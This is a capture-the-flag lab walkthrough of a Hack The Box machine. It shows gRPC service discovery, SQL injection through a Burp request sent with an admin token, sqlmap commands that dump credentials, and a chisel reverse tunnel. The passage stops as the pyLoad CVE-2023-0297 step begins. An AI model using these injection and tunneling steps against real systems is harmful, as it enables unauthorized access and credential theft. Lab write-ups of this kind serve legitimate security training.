$ nmap -p- --min-rate 3000 -Pn 10.129.40.34
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-21 03:19 EDT
Nmap scan report for 10.129.40.34
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
50051/tcp open unknown
Port 50051 -> gRPC
I've never seen port 50051 open on a HTB machine before, so I ran a detailed nmap scan too:
$ sudo nmap -p 22,50051 -sC -sV -O -T4 10.129.40.34
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-21 03:20 EDT
Nmap scan report for 10.129.40.34
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port50051-TCP:V=7.93%I=7%D=5/21%Time=6469C65A%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0
SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic
SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe
SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO
SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0
SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP
SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\
SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC
SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\
SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe
SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\
SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0
SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0
SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\
SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0
SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\
SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0
SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0
SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf
SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0
SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?
SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0
SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x
SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\
SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff
SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\
SF:0\0\0\0\0\?\0\0");
I see that this has some headers. I tried connecting using telnet or nc, then viewing the traffic within wireshark, but all I saw was this:
Just a bunch of unrelated TCP traffic. I tried running curl on the port and received another weird error.
$curlhttp://10.129.40.34:50051curl: (1) Received HTTP/0.9 when not allowed
Googling about this error leads me to a post about gRPC servers.
There are specific tools that are used to interact with this software, and we can test a few of them to make sure that this is gRPC. I googled for tools that could enumerate this, and found grpc-client-cli.
The tool worked, which means this is indeed gRPC running.
SimpleApp Enum -> SQL Injection
This thing was running a 'SimpleApp' application, and we can enumerate it to see the default values accepted, create a user and login.
$./grpc-client-cli-V10.129.40.34:50051? Choose a service: SimpleApp? Choose a method: RegisterUserMessagejson (type ?toseedefaults): ?{"username":"","password":""}Messagejson (type ?toseedefaults): {"username":"test","password":"test123"}{"message":"Account created for user test!"}Method:/SimpleApp/RegisterUserStatus:0OKRequestHeaders:user-agent: [grpc-go/1.53.0]ResponseHeaders:content-type: [application/grpc]grpc-accept-encoding: [identity, deflate,gzip]Requestduration:180.052244msRequestsize:20bytesResponsesize:41bytes? Choose a method: LoginUserMessagejson (type ?toseedefaults): {"username":"test","password":"test123"}{"message":"Your id is 899."}Method:/SimpleApp/LoginUserStatus:0OKRequestHeaders:user-agent: [grpc-go/1.53.0]ResponseHeaders:content-type: [application/grpc]grpc-accept-encoding: [identity, deflate,gzip]ResponseTrailers:token: [b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NDY2NDY4M30.JkX8rMMOYdWbSBiUnGmjKH85lwXj1JI-nJD4J5ELbkY'] Requestduration:181.44517msRequestsize:20bytesResponsesize:166bytes
So obviously, we have to exploit this to get the administrator account somehow. When I try to use the getInfo function, it complains that I don't have a valid token.
Using this, we can capture the request in Burpsuite and attempt to include our administrator token. This was the HTTP request I sent via Burp, and it kept running into an error:
POST /invoke/SimpleApp.getInfo HTTP/1.1Host:127.0.0.1:35935User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept:*/*Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/jsonx-grpcui-csrf-token:CUWLdMi5MxC2Io1JfHZ_oSUCHn4YZO5fYhkk2qAd9nkX-Requested-With:XMLHttpRequestContent-Length:193Origin:http://127.0.0.1:35935Connection:closeReferer:http://127.0.0.1:35935/Cookie:_grpcui_csrf_token=CUWLdMi5MxC2Io1JfHZ_oSUCHn4YZO5fYhkk2qAd9nkSec-Fetch-Dest:emptySec-Fetch-Mode:corsSec-Fetch-Site:same-origin{"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODQ2NjUwNzF9.iur8GhCEFahebtqwyeFLj7wybSwtO4qesiLEWKTv614"}],"data":[{"id":"123"}]}
I thought it was intentional, so I attempted some basic command and SQL injection. I found that UNION SQL injection works!
Using version enumeration, we can find that this uses SQLite.
I tossed this Burp request to sqlmap, which also gives me a true positive.
sqlmap-rreq-pid--level5--risk3--dbmssqlite
Then, we can enumerate the database and dump the passwords within the database.
We had credentials for this user, and it works with ssh.
Privilege Escalation
PyLoad -> CVE-2023-0297 RCE
When checking netstat output, we can see that port 8000 is open on the machine:
sau@pc:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
We can use chisel or ssh to port forward this and view it within our browser.
# within Kalichiselserver-p5555--reverse# within hostchiselclient10.10.14.395555R:8000:127.0.0.1:8000
Here, we will see a PyLoad instance.
This software had a recent RCE vulnerability found within it.
We can check the version within the machine to confirm that it is vulnerable: